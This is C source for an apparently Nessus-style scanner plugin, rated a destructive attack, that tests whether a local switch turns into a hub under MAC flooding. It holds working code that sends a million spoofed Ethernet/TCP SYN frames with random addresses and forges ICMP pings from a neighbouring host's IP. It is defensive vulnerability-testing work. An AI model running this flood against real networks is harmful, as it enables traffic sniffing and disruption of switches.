/*
 * This script is (C) Renaud Deraison
 * It is released under the GPLv2
 */
#include <includes.h>
#include <pcap.h>
#include <libnet.h>

#define EN_NAME "3Com hub"

#define EN_FAMILY "Misc."

#define EN_DESC "\
The remote host on the local network seems to be connected\n\
through a switch which can be turned into a hub when flooded\n\
by different mac addresses.\n\n\
The theory is to send a lot of packets (> 1000000) to the\n\
port of the switch we are connected to, with random mac\n\
addresses. This turns the switch into learning mode, where\n\
traffic goes everywhere.\n\
An attacker may use this flaw in the remote switch\n\
to sniff data going to this host\n\n\
Solution : Lock Mac addresses on each port of the remote switch\n\
Risk factor : High\n\
See also : http://www.securitybugware.org/Other/2041.html"

#define EN_COPY "Written by Renaud Deraison <deraison@cvs.nessus.org>"

#define EN_SUMM "Turns the remote switch into a hub"



int plugin_init(desc)
 struct arglist * desc;
{ 
 plug_set_id(desc, 11025);
 plug_set_version(desc, "$Revision: 1.1 $");
 
 plug_set_name(desc, EN_NAME, NULL);
 
 
 plug_set_category(desc, ACT_DESTRUCTIVE_ATTACK);
 
 
 plug_set_family(desc, EN_FAMILY, NULL);
 
 
 plug_set_description(desc, EN_DESC, NULL);
 
 plug_set_summary(desc, EN_SUMM,NULL);
 
 plug_set_copyright(desc, EN_COPY, NULL);;
 plug_set_timeout(desc, PLUGIN_TIMEOUT*4);
 return(0);
}

int 
flood(device)
  char * device;
{
  u_char enet_src[6], enet_dst[6];
  char err_buf[LIBNET_ERRBUF_SIZE];
  struct libnet_link_int * network;
  int packet_size;
  u_char * packet;
  int i;

  network = libnet_open_link_interface(device, err_buf);
  if(network == NULL)
  {
    libnet_error(LIBNET_ERR_FATAL, "libnet_open_link_interface: %s\n",
		err_buf);
    return -1;
  }

  for(i=0;i<1000000;i=i+1)
  {
    int j;
    struct in_addr src, dst;
    struct in_addr mask, rnd;

    inet_aton("10.0.0.0", &src);
    inet_aton("10.0.0.0", &dst);
    inet_aton("255.0.0.0", &mask);

    rnd.s_addr = (rand()) & (~mask.s_addr);
    src.s_addr = src.s_addr | rnd.s_addr;
    
    rnd.s_addr = rand() & (~mask.s_addr);
    dst.s_addr = dst.s_addr | rnd.s_addr;


  packet_size = LIBNET_IP_H + LIBNET_ETH_H + LIBNET_TCP_H;
  libnet_init_packet(packet_size, &packet);
  for(j=0;j<6;j=j+1)
  {
    enet_src[j] = rand() % 255;
    enet_dst[j] = rand() % 255;
  }

  libnet_build_ethernet(enet_dst, enet_src, ETHERTYPE_IP, NULL, 0, packet);
  libnet_build_ip(TCP_H, 0, rand(), 0, 64, IPPROTO_TCP, src.s_addr, dst.s_addr, NULL, 0, packet + LIBNET_ETH_H);
  libnet_build_tcp(rand() % 65535, rand() % 65535, rand(), rand(), TH_SYN, 1024, 0, NULL, 0, packet + LIBNET_ETH_H + LIBNET_IP_H);

  libnet_do_checksum(packet+ETH_H, IPPROTO_TCP, LIBNET_TCP_H);
  libnet_write_link_layer(network, device, packet, packet_size);
  libnet_destroy_packet(&packet);
  }
  libnet_close_link_interface(network);

  return 0;
}

int
ping(dev, src, dst)
  char * dev;
  struct in_addr src;
  struct in_addr dst;
{
  pcap_t * pcap;
  int packet_size = LIBNET_IP_H + LIBNET_ICMP_ECHO_H;
  struct libnet_arena * arena_p, arena;
  int rsoc;
  u_char *packets[5];
  int i;
  int b;
  char errbuf[PCAP_ERRBUF_SIZE];
  char filter[1024];
  char *asc_src;
  bpf_u_int32 network, netmask;
  static struct bpf_program filter_prog;
  struct pcap_pkthdr head;
  int ret;

  arena_p = &arena;


  b = wait_for_free_bpf(15);
  if(b >= 0)
  {
    release_bpf(b);
    pcap = pcap_open_live(dev, 1500, 1, 1000, errbuf);
  }
  else return -1;

  if(!pcap)
    return -1;

  pcap_lookupnet(dev, &network, &netmask, 0);
  asc_src = estrdup(inet_ntoa(src));
  sprintf(filter, "icmp and src host %s and dst host %s",
      		inet_ntoa(dst),
		asc_src);
  efree(&asc_src);
  pcap_compile(pcap, &filter_prog, filter, 0, netmask);
  pcap_setfilter(pcap, &filter_prog);

  libnet_init_packet_arena(&arena_p, 5, packet_size);
  rsoc = libnet_open_raw_sock(IPPROTO_RAW);
  if(rsoc < 0)
  {
    libnet_error(LIBNET_ERR_FATAL, "Can't open the network\n");
    return -1;
  }


  for(i=0 ; i < 5 ; i++)
  {
    packets[i] = libnet_next_packet_from_arena(&arena_p, packet_size);
    libnet_build_ip(ICMP_ECHO_H,
		IPTOS_LOWDELAY | IPTOS_THROUGHPUT,
		rand(),
		0,
		48,
		IPPROTO_ICMP,
		src.s_addr,
		dst.s_addr,
		NULL,
		0,
		packets[i]);

    libnet_build_icmp_echo(ICMP_ECHO,
		0,
		rand(),
		5,
		NULL,
		0,
		packets[i]+ LIBNET_IP_H);

    libnet_do_checksum(packets[i], IPPROTO_ICMP, LIBNET_ICMP_ECHO_H);
    libnet_write_ip(rsoc, packets[i], packet_size);
  }

  if(pcap_next(pcap, &head))ret = 1;
  else ret = 0;
  libnet_destroy_packet_arena(&arena_p);
  libnet_close_raw_sock(rsoc);
  pcap_close(pcap);
  return ret;
}

struct in_addr find_fake(dev, dst, me, network, mask)
  char * dev;
  struct in_addr dst, me;
  bpf_u_int32 network, mask;
{
  bpf_u_int32 start, end, i;

  start = network & mask;
  end = (network & mask) | (~mask);
  i = start;
  for(;;)
  {
    struct in_addr ip;
    if(ntohl(i) >= ntohl(end))
    {
      ip.s_addr = 0;
      return ip;
    }

    i = htonl(ntohl(i) + 1);
    ip.s_addr = i;
    if((ip.s_addr == dst.s_addr) || (ip.s_addr == me.s_addr))
      continue;
    if(ping(dev, me, ip) > 0)
      return ip;
  }
}

int
plugin_run(desc)
 struct arglist * desc;
{
  struct in_addr target;
  struct in_addr myip;
  struct in_addr fakeip, broadcast, netaddr;
  struct in_addr * ptr;
  char * dev;
  bpf_u_int32 net, mask;
  char errbuf[PCAP_ERRBUF_SIZE];
  
  
  ptr = plug_get_host_ip(desc);
  target.s_addr = ptr->s_addr;
  dev = routethrough(&target, &myip);
  pcap_lookupnet(dev, &net, &mask, errbuf);
  if((net & mask) != (target.s_addr & mask))
    return 0;	/* not a local host */


 netaddr.s_addr = net & mask;
 broadcast.s_addr = (net & mask) | (~mask);
 
 fakeip = find_fake(dev, target, myip, net, mask);
 if(!fakeip.s_addr)
   return 0; /* we are alone on this network */

 if(!ping(dev, fakeip, target))
 {
   /*
    * Good thing - the remote host did not reply to our ping. We can
    * go on
    */
   flood(dev);
   if(ping(dev, fakeip, target))
   {
   	/* The remote host replied. Not good. We won */
   	post_hole(desc, 0, NULL);
   }
 }
 return 0;
}
